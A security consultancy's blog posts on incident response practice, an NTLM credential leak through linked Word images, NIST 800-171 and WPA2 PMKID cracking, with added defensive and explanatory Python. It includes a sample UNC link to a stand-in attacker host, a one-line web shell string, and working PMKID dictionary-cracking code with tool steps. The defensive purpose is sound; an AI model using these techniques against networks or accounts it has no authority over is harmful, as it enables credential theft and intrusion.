Test Your Incident Response Plans

We all must have an incident response plan, and it only gets used after a computer security problem has occurred. The outline of such a plan:

  1. Detect the problem
  2. Investigate the problem
  3. What type of threat is this to the business?
  4. Does it rise to the level of a "breach", with significant legal disclosure requirements?
  5. Did the attackers steal information/data?

 

We know practice makes perfect, but how do we practice responding to a known attack without actually hiring a hacker to break into our systems?

Getting a pentester to test your environment for problems is of course a good thing. But we also need a method of getting our IT staff to not be afraid of following the crumbs to a potential breach. People get better the more they do something, so the findings of a pentest are also useful raw material for IT staff to practice writing incident reports.

With or without a pentest it is wise to create a "write-up" report that acts as if the breach or hack happened, so that IT personnel get used to working through the "paperwork" process.

 

So let us do it together:

1. We detected a problem in the logs: they were zeroed out on our Windows 2012 server.

2. We do not know why this happened, but the event logs now contain only a handful of events (going back to yesterday only). If the logs were cleared with the normal Windows tools, Windows writes a "log cleared" event of its own (ID 1102 in the Security log, ID 104 in the System log) that names the account that did it, so that is the first record to look for.

3. Is this a threat to the business? If there are no logs, how will we know what happened in the last few days before the logs were deleted?

4. Review the system to see if any new files have been added; you will have to compare against recent backups (or a known-good baseline of file hashes). Also review any customer data that resides on the server (is the customer data still valid?). If you have no way of doing this today, better start working on a process now.

5. The last point is where the most difficult assessment has to be performed. Is this a threat to the business? Was data stolen?
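The two checks from steps 2 and 4 of this walkthrough, as an added example that is not part of the original post: the event records and the server file tree are constructed inline so it runs offline (in practice the events would come from an export of the Security and System logs, and the baseline from a backup or an earlier hash snapshot). Account names, timestamps and file names are made up for the demonstration.

```python
"""Added example (not from the original post): triage checks for a cleared
event log and for files that differ from a known-good baseline."""
import hashlib
import tempfile
from datetime import datetime, timedelta
from pathlib import Path

# Windows records the clearing of a log as an event of its own: 1102 in the
# Security log (Microsoft-Windows-Security-Auditing) and 104 in the System
# log (Microsoft-Windows-Eventlog). Both carry the account that did it.
LOG_CLEARED_IDS = {1102, 104}

# Constructed sample of what survives in the logs after the wipe: a few
# records only, the oldest about a day old.
NOW = datetime(2018, 8, 10, 9, 0, 0)
SAMPLE_EVENTS = [
    {"time": NOW - timedelta(hours=26), "log": "System", "id": 104,
     "provider": "Microsoft-Windows-Eventlog", "user": "CORP\\jsmith"},
    {"time": NOW - timedelta(hours=26), "log": "Security", "id": 1102,
     "provider": "Microsoft-Windows-Security-Auditing", "user": "CORP\\jsmith"},
    {"time": NOW - timedelta(hours=20), "log": "Security", "id": 4624,
     "provider": "Microsoft-Windows-Security-Auditing", "user": "CORP\\svc_backup"},
    {"time": NOW - timedelta(hours=2), "log": "Security", "id": 4672,
     "provider": "Microsoft-Windows-Security-Auditing", "user": "CORP\\jsmith"},
]


def triage_events(events, now=NOW, expected_retention_days=30):
    """Return findings: explicit 'log cleared' records, plus a log horizon that
    is far shorter than the retention you expect (oldest surviving record is
    too young), which is the symptom described in the walkthrough."""
    findings = []
    for ev in events:
        if ev["id"] in LOG_CLEARED_IDS:
            findings.append(f"{ev['log']} log cleared at "
                            f"{ev['time']:%Y-%m-%d %H:%M} by {ev['user']}")
    if events:
        horizon = now - min(ev["time"] for ev in events)
        if horizon < timedelta(days=expected_retention_days):
            findings.append(f"log horizon is only {horizon.days} day(s); "
                            f"expected {expected_retention_days}")
    return findings


def snapshot(root):
    """Map relative path -> sha256 for every regular file under root."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def compare(baseline, current):
    """Diff two snapshots; 'added' is the list step 4 asks for."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def demo_file_check():
    """Constructed server tree: take a baseline (the 'backup'), then change it
    the way an intruder might, and report the differences."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "inetpub").mkdir()
        (root / "inetpub" / "index.html").write_text("<h1>shop</h1>")
        (root / "customers.csv").write_text("id,name\n1,alice\n")
        baseline = snapshot(root)
        # Today's state: a script dropped in the web root and an edited data file.
        (root / "inetpub" / "cmd.aspx").write_text("<% eval(Request['x']) %>")
        (root / "customers.csv").write_text("id,name\n1,alice\n2,mallory\n")
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for line in triage_events(SAMPLE_EVENTS):
        print("FINDING:", line)
    print(demo_file_check())
```

The horizon check matters because an attacker who clears a log with a less obvious method may leave no 1102 or 104 record at all; the sudden absence of history is then the only indicator. The file comparison is only as good as the baseline, which is the point of step 4: if no hash snapshot or backup exists, build the process before you need it.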

And this is exactly where many companies get tripped up. Every day you are running your business and it seems like any other day. Losing event logs does not seem to mean much... but it can be a sign of a serious breach.

Find out if your files have been altered. The problem is that some malware is only there for other purposes, so some altered files carry lower risk and impact. How can we know if an alteration is high impact and high risk?

To have any chance of knowing that a breach happened, your IT personnel need to be able to do the following:

  • Stay vigilant
  • Notice unauthorized logins
  • See unauthorized usage of computer systems
  • Ask why reboots are mysteriously happening on their own
  • Review administrative account activity for actions the administrators do not recognize
  • Notice unusual outbound traffic
  • Notice files being added to computer systems without the IT department's knowledge
  • Notice logs being deleted, or very few event logs being available on critical systems
  • Determine whether data was stolen

 

A lot of these bullet points assume you can see potential breach indicators, so here is an infographic to help you with this process (image not reproduced here).

If you are not testing your incident response plans, what will happen when a real attack happens?

Contact us to help you with oversight or auditing needs.

 

How are Hackers Always a Step Ahead of Defense?

So the defense (also known as the Blue team) has been inundated with spam; the goal of the spam, for the hackers, is for an unsuspecting user to give up their credentials (username and password). Hackers are always trying to get your usernames and passwords.

Opening a Word document? What if it included a small linked object that is unlikely, or even impossible, to notice when first opening the file, because it has been resized to a tiny point in the document?

The image above (not reproduced here) shows how to create a link inside a picture.

The above image is from an ISC.sans.edu diary.

So because of the various dirty tricks in spam we built 2FA (two-factor authentication), so that connecting to the email server and getting your email would effectively shut out the spam merchants... until now, with this nifty trick. (Do you have to re-establish 2FA every time you get email? Or only when first logging in?)

When you open the Word document the picture activates and tries to fetch its linked target from criminal-hacker-website.com. If that link is a UNC path (\\criminal-hacker-website.com\share\picture.png), Windows tries to authenticate to the attacker's server over SMB and hands the NTLM challenge-response for the logged-on user's account to criminal-hacker-website.com, where it can be cracked or relayed. No password prompt and no 2FA prompt is involved, because the computer does this on the user's behalf.

Clearly a username-and-password-only defense is not going to do the job, as many tricks will pry your account information out of you. An incorrectly set up 2FA would also be a problem.

The defense must have good logging and an egress filter set up: block outbound 445/tcp, 137/tcp, 139/tcp, 137/udp and 139/udp at the perimeter, so that a workstation cannot complete an SMB or NetBIOS connection to a server on the Internet.
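A way to catch such a document before a user opens it, as an added example that is not part of the original post or the ISC diary: a linked (rather than embedded) picture in a .docx is just a relationship entry with TargetMode="External" in one of the package's .rels parts, so a mail gateway or triage script can list every external target and flag UNC paths. The sample document is constructed in memory with the placeholder host name the post uses; the part names and namespaces are the standard OOXML ones.

```python
"""Added example (not from the original post): build a constructed .docx whose
picture is an external link to a UNC path, then scan it for such links."""
import io
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Minimal OOXML parts. The document body does not matter for the scan; the
# relationship file is where a linked picture lives.
DOCUMENT_XML = """<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"
 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
 <w:body><w:p><w:r><w:t>Invoice attached.</w:t></w:r></w:p></w:body></w:document>"""

RELS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
 <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
  Target="styles.xml"/>
 <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
  Target="\\\\criminal-hacker-website.com\\pics\\logo.png" TargetMode="External"/>
</Relationships>"""


def build_sample_docx() -> bytes:
    """Constructed sample: the bytes of a tiny .docx (a zip container)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder; not used by the scan
        z.writestr("word/document.xml", DOCUMENT_XML)
        z.writestr("word/_rels/document.xml.rels", RELS_XML)
    return buf.getvalue()


def external_targets(docx_bytes: bytes):
    """Every relationship, in any .rels part, that points outside the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, rel.get("Target", "")))
    return hits


def classify(target: str) -> str:
    """A UNC or file:// target makes Windows attempt an SMB authentication to
    that host; an http(s) target is a plain fetch (still a beacon)."""
    t = target.strip()
    if t.startswith("\\\\") or t.lower().startswith("file://"):
        return "unc"
    if t.lower().startswith(("http://", "https://")):
        return "http"
    return "other"


def scan(docx_bytes: bytes):
    """(part, relationship type, target, class) for each external link."""
    return [(part, typ, target, classify(target))
            for part, typ, target in external_targets(docx_bytes)]


if __name__ == "__main__":
    for row in scan(build_sample_docx()):
        print(row)
```

The same relationship scan works for .xlsx and .pptx, since they use the same package format; the egress rule above is the backstop for the documents the scan never sees.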

Back to my question: "How are hackers always a step ahead of the defense?"

The answer lies in logic, actually: if you have to defend 24 hours a day, every day, while still using software and the Internet, then it is only a matter of time before a hacker uses ingenuity to break or bypass your defenses, as shown above. We have to constantly be aware of new attacks, and thus of ways of defending against the new vulnerabilities found every day.

True, it would be nice if no software had security issues, but as we know security is not the highest priority while making a product. Making money is, and sometimes a security audit is not high on the priority scale.

So it is the same old "risk versus security" see-saw.

The people who focus on security might spend more in resources than others. So when you hear of a new potential attack, are you impulsively scoffing? Or are you saying "I have to learn this attack and defend against it" (and thus spending resources)?

If you are scoffing, you are choosing to take on more risk by hoping the security problems will go away just because you think they will. The risk on the Internet these days is not that low, and the ingenuity of new attacks is coming so fast that if you have not upped your ante, one day it will be too late and the headlines will serve as your epitaph.

So we believe you should do both: accept some risk while also staying secure by employing security auditors.

 

Contact Us to discuss

NIST 800-171 Compliance Can be Done Quickly!

NIST 800-171 compliance is what the DFARS cybersecurity requirements (DFARS clause 252.204-7012) actually demand.

The NIST 800-171 requirements have always vexed small manufacturers due to their specific wordiness, so NIST (the National Institute of Standards and Technology) has been trying to make them easier to understand with the following PDF, NIST Handbook 162: https://nvlpubs.nist.gov/nistpubs/hb/2017/NIST.HB.162.pdf

This is an important paragraph from the PDF:

Executive Order 13556, Controlled Unclassified Information, November 4, 2010, establishes that the Controlled Unclassified Information (CUI) Executive Agent, designated as the National Archives and Records Administration (NARA), shall develop and issue such directives as are necessary to implement the CUI Program. Consistent with this tasking and with the CUI Program's mission to establish uniform policies and practices across the federal government, NARA issued a final federal regulation in 2016 that established the required controls and markings for CUI government-wide. This federal regulation binds agencies throughout the executive branch to uniformly apply the standard safeguards, markings, dissemination, and decontrol requirements established by the CUI Program.

 

So needless to say, if you are a small manufacturer and sell to the US government you will have to be compliant, or else... what is the "or else"? I surmise the "or else" is pretty bad, since there has been plenty of time for you to get on board with this initiative. Admittedly it has been a chore to get through the NIST 800-171 documents up to now, as I discussed in June on this site.

Like this, for example (excerpt not reproduced here):

There are many such points in the document.

Here is the full list of the 14 control families you have to work on:

  1. AC – Access Control
  2. AT – Awareness and Training
  3. AU – Audit and Accountability
  4. CM – Configuration Management
  5. IA – Identification and Authentication
  6. IR – Incident Response
  7. MA – Maintenance
  8. MP – Media Protection
  9. PS – Personnel Security
  10. PE – Physical Protection
  11. RA – Risk Assessment
  12. CA – Security Assessment
  13. SC – System and Communications Protection
  14. SI – System and Information Integrity

 

None of these points is brain surgery requiring 10-plus years of training and schooling. In fact your IT department can perform most of these in their regular work; they just need support from above (i.e. resources).

The one area the company cannot do effectively by itself is the auditing side (Audit and Accountability, and especially the Security Assessment family): there is nothing like a person from outside the organization to bring a fresh point of view, or at least one without the company culture in mind. That is what we do here at Fixvirus.com.

So these 14 points should not dissuade you from becoming compliant. Even if you do not yet have multi-factor authentication (an Identification and Authentication requirement) and it would take 6 months to implement, what you have to do is document the gap in your System Security Plan and create a POA&M (Plan of Action and Milestones) with dates for closing it. Once the written-up proof and the POA&Ms exist you are on the compliant path. The caveat: a POA&M is a commitment to close the gap on a schedule, not a substitute for closing it, so the milestones have to be met.

This is how I can state that you can come into "compliance" with NIST 800-171 quickly.

Contact us to review and discuss .

Does Outsourcing Make You More Secure?

Outsourcing is good: since we cannot specialize in everything, we can focus on sales or inventory instead of mundane tasks. So what is important and what is mundane? That depends on your business... Most businesses are not software companies, so obtaining software by outsourcing may be smart. Then the question is: should you buy the software, or just rent it on a server on the Internet ("the cloud")?

The answer to what is important depends on your business. Obviously if you are a restaurant it is food. But what if it is not as obvious? How about if you are selling services online and offline (with sales people)?

Every business has customers or patients (whatever the industry term is), and every business has to get paid somehow. So the payment information and the customer database have to be secured in all businesses (and, for that matter, in non-profits as well).

Customers are important to the business since they keep it afloat. Thus everything to do with our customers is important to us, and to our competitors. Of course employee data is also important to keep secure.

This is the same line of thinking you use when setting up a risk management analysis.

Depending on the business, some of the important electronic information may be how one creates a product.

For all businesses the financial transactions, accounting and anything to do with money have to be safeguarded. Overarching all of this, Identity and Access Management (IAM) is important.

The major business sectors:

  1. Sales of non-unique items (commodities): retail, wholesale, restaurants, etc.
  2. Manufacturing, mining and farming: industries that obtain materials from the earth, and might have IP (intellectual property)
  3. Health industry: any business that takes care of patients
  4. Consulting industry: bills labor at an hourly rate
  5. Technology industry: computer systems are used to create technology

All of these businesses have some things in common, even if not all of them have IP: a customer database, computer equipment, and financial information (accounting).

The commonality of computer systems, accounting, customers and employees makes every business ask: what exactly do we outsource? The experts say outsource the functions that are not central to your main business model. So everyone except accountants could outsource the financial applications by using online apps in the cloud (someone else runs the computer). Notice that I do not say the reason to outsource is to be more secure. Security on the Internet is not predicated on whether you outsource to the cloud.

Outsourcing has to do with business reasons, not security. The bottom line in the year 2018 and beyond: cybersecurity must be in everything, no matter what. The key is that even though we expect it (cybersecurity), we do not want to overpay. This is where the next stage of our analysis comes into play.

RISK MANAGEMENT is a direct result of what is important to the business, what is outsourced, and how to allocate resources.

Every business is different and must make the choices that weigh the needs of the business. If you have IP then that could be more important than customers, since the customers will come back to you if you have the IP.

But if there is no IP, the most important functions might be a close tie between customers and financial data (credit card or bank information). Everyone has computers that connect to the Internet, and this is where the true outsourcing idea comes to fruition: even with everything in the cloud, we still have to secure the devices we use to connect to it.

Social engineering and scams can always take over and steal your hard-earned resources even if you have good security. So the reality is that outsourcing, or "the cloud", does not change that.

Secure your devices!! Keep up to speed with the changing cybersecurity landscape, such as on our Security News Analyzed page.

Contact us to make this happen by using security policies, risk management analysis and more.

 

New Wi-Fi attack found on WPA2 using PMKID

This could make many Wi-Fi routers that were thought safe not so safe.

Here is where paying attention to new attacks is important.

hashcat.net has the information:

This attack does not even need a full EAPOL 4-way handshake. EAPOL stands for Extensible Authentication Protocol (EAP) over LAN. A simple 4-way handshake is shown pictorially below (from hitchhikersguidetolearning.com; image not reproduced here).

This means that in the past an attack on Wi-Fi would need the EAPOL 4-way handshake to be captured, which requires a client to connect (or be forced to reconnect) while you are listening. Capturing the 4-way handshake is sometimes difficult to achieve.

Instead, in this attack: "We receive all the data we need in the first EAPOL frame from the AP."

First, capture a sample initial message from the "Authenticator" (the access point) which includes a PMKID (run hcxdumptool).

Second, run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat.

Third, run hashcat to crack the string of data.

The reason the handshake is not needed: the PMKID is an HMAC-SHA1 computed with the PMK over the string "PMK Name" plus the AP and client MAC addresses, and the PMK itself is PBKDF2 of the passphrase and SSID. The only secret in that computation is the passphrase, so the attack is a dictionary or brute-force guess against it, exactly as with a captured handshake, and a long random passphrase is still out of reach. It also only works against access points that actually include the PMKID in that first EAPOL frame.
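The computation hashcat performs in the third step, as an added example that is not part of the original post or of the hashcat or hcxtools projects: derive the PMK and PMKID for candidate passphrases and compare against a captured value. The hash line is constructed here from a known passphrase, SSID and MAC addresses (all made up) so the example runs offline and stands in for the output of hcxpcaptool; it is not a real capture. The line format (pmkid*apmac*stamac*ssidhex) is hashcat's mode 16800.

```python
"""Added example (not from the original post): the PMKID derivation behind the
attack, plus a small dictionary attack over a hashcat mode-16800 line."""
import hashlib
import hmac

SSID = b"HomeNet"                          # constructed
AP_MAC = bytes.fromhex("4604ba734d4e")     # constructed authenticator (AP) MAC
STA_MAC = bytes.fromhex("89acf0e761f4")    # constructed supplicant (client) MAC


def pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def pmkid(pmk_bytes: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA).
    Nothing from the client's side of the handshake goes in, which is why the
    first EAPOL frame from the AP is enough."""
    return hmac.new(pmk_bytes, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def make_16800_line(passphrase: bytes, ssid=SSID, ap_mac=AP_MAC, sta_mac=STA_MAC) -> str:
    """Stand-in for hcxpcaptool -z output: pmkid*apmac*stamac*ssidhex."""
    value = pmkid(pmk(passphrase, ssid), ap_mac, sta_mac)
    return "*".join([value.hex(), ap_mac.hex(), sta_mac.hex(), ssid.hex()])


def parse_16800_line(line: str):
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(ssid_hex))


def crack(line: str, wordlist):
    """Dictionary attack: recompute the PMKID for each candidate and compare.
    The cost per candidate is one PBKDF2 (4096 SHA1 rounds), the same work a
    handshake crack needs; the PMKID only removes the capture difficulty."""
    target, ap_mac, sta_mac, ssid = parse_16800_line(line)
    for word in wordlist:
        if hmac.compare_digest(pmkid(pmk(word, ssid), ap_mac, sta_mac), target):
            return word
    return None


# Constructed wordlist; a real attack uses a large list or a hashcat mask.
WORDLIST = [b"password", b"letmein1", b"HomeNet2018", b"correcthorse"]

if __name__ == "__main__":
    captured = make_16800_line(b"HomeNet2018")
    print("hash line:", captured)
    print("recovered:", crack(captured, WORDLIST))
```

Two practical notes: the client MAC in the line is whatever station the AP addressed the frame to, so the attacker's own card can be that station, and later hashcat releases replaced mode 16800 with the combined mode 22000 (hc22000 format), which carries the same fields.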

 

So now no 4-way handshake is needed, only the expertise to run a couple of tools and to know how to set up the Wi-Fi capture using the Wi-Fi network card.

The comments on the hashcat web page do mention that your Wi-Fi network card must be capable of capturing raw wlan traffic (monitor mode).

So this requires more review and investigation.

Contact us to try it on your network.